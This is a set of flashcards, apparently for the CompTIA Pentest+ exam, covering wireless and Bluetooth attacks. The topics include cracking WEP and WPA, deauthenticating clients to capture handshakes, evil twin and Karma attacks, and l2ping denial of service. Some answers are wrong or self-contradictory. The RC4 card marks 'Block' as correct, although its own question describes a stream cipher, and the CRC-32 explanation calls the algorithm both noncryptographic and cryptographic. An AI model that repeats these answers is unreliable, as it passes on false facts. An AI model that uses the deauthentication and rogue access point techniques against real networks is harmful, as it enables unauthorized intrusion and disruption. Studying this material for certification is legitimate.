CompTIA Pentest+ Chapter 8 Questions Flashcards
WEP uses an encryption algorithm called RC4; which was developed by Ronald Rivest.
RC4 is a \_\_\_\_ cipher, which is symmetric key cipher used to expand a short key into an infinite pseudo-random keystream. A.Keystream B.Asymmetric C.Block D.Secret
C.Block
CRC-32 is an algorithm used to verify the integrity of network packets for WEP and is also found indifferent applications to detect changes in hardware.
CRC-32 is based on the original cycle redundancy check and is not recommended for verifying the integrity of modern-day technology due to the fact that ______ (Select the best answer)
A.It is an older form of integrity checking software that has multiple vulnerabiltiies
B.CRC-32 is a variant of CRC, which is based on non cryptographic algorithm that offers very little assurance with regard to data manipulation
C.CRC is a variant of CRC-32, which is based on a cryptographic algorithm that offers very little assurance with regard to data manipulation
D. It is an older form of integrity checking software that has few to no vulnerabilities
B.CRC-32 is a variant of CRC, which is based on non cryptographic algorithm that offers very little assurance with regard to data manipulation
Explanation:
CRC-32 is a noncryptographic algorithm based off of CRC (cyclic redundancy check).
Since the algorithm is based on code generation and cryptography, it provides little value with regard to integrity, as this value can easily be reproduced
In order to crack WEP, you need to capture enough initialization vectors (IV) in the network packets to recover the secret key.
WEP secret keys can be one of two different lengths.
10-digit keys are 64 bits in lengths.
How many digits are in a key length of 128-bits? A.24 B.16 C.26 D.28
C.26
Explanation:
A WEP key of 64 bits in length is 10 digits and a 128-bit key length is 26 digits
With WPA, the wireless client and the access point both know the pre-shared key in order to join the network.
During the authorization process, each device will use the PSK to generate a pairwise master key (PMK) in order to derive a _____ which is used to encrypt packets sent to receiving host.
What is this type of key called? A.Pre-shared key B.Pairwise share key C.Pairwise transfer key D.Pairwise transient key
D.Pairwise transient key
Explanation:
The PMK is never exposed over the network; instead the pairwise transient key (PTK) is derived from the PMK and used to encrypt network communication
During a pentest, your team identifies an access point that is broadcasting the SSID value and is protected with only WEP encryption.
Your team attempts to use aireplay-ng to replay an injected ARP packet over the network; however, the tool has not captured any ARP replies over the network.
This is likely due to the fact that there are no clients talking over the network.
In order to speed up the cracking process, what could you recommend your team to do?
A.Use a MiTM tool in order to attack clients actively listening on the network
B.Use the ping command and ping nonexistent hosts on the network
C.Try and telnet or remotely log in to other hosts over the network
D.Navigate to web pages in your browser in order to generate some network traffic
B.Use the ping command and ping nonexistent hosts on the network
Explanation:
The use of ping against nonexistent hosts repeatedly will generate multiple IVs with the AP as the host, but will never be identified, and the request will continue to propagate throughout the network
PBKDF2 is used to calculate the PMK using the following values, except for which one? A.The password/passphrase (PSK) B.The access point SSID or ESSID C.The length of the SSID or ESSID D.The host name of the device
D.The hostname of the ddevice
Explanation:
The PMK is derived from all of the options, with the exception of the device host name.
The missing values are 256 (length of the PMK) and 4096 (number of hashing iterations)
In order to crack the WPA or WPA2 PSK you will need to capture the four-way handshake.
During a pentest, your team identifies multiple clients on the target network.
What is the best way to capture the handshake?
A.Deauthenticate one of the clients
B.Send multiple ARP requests over the network
C.Deauthenticate all the clients on the network
D.Send multiple ARP requests to the access point
A.Deauthenticate one of the clients
Explanation:
Deauthentication tells the client to disassociate from the wireless network
Deauthenticating one client at a time until you capture the handshake would be the recommended choice of action, as it helps to remain quiet in your approach and would be the method that would cause the least amount of resistance from customers during an engagement
The evil twin access point is a type of attack used to duplicate the existence of a legitimate access point in order to entice victims to connect for the purpose of targeting end-user devices or communications.
Another way to imitate all possible access points from client beacons requests is called what? A.Karma attack B.Replay attack C.AP relay attack D.Social engineering attack
A.Karma Attack
Explanation:
The Karma attack will target any SSID it discovers in order to increase the likelihood for exploitation
This command can be used to execute a type of "ping of death" against Bluetooth devices. A.L2PP B.L2TP C.L2PING D.LPING
C.L2PING
Explanation:
L2PING provides a method that can be used to identify Bluetooth devices, as well as target them for DoS attacks, using the target MAC address
All of the following are layers in the Bluetooth protocol stack except for which one? A.LMP B.SDP C.L2CAP D.TC2 E.RCOMM
D.TC2
Explanation:
TC2 is not a valid layer of Bluetooth protocol stack.
TCS is however, a valid layer in the protocol stack and is used for controlling telephone functions on the mobile device
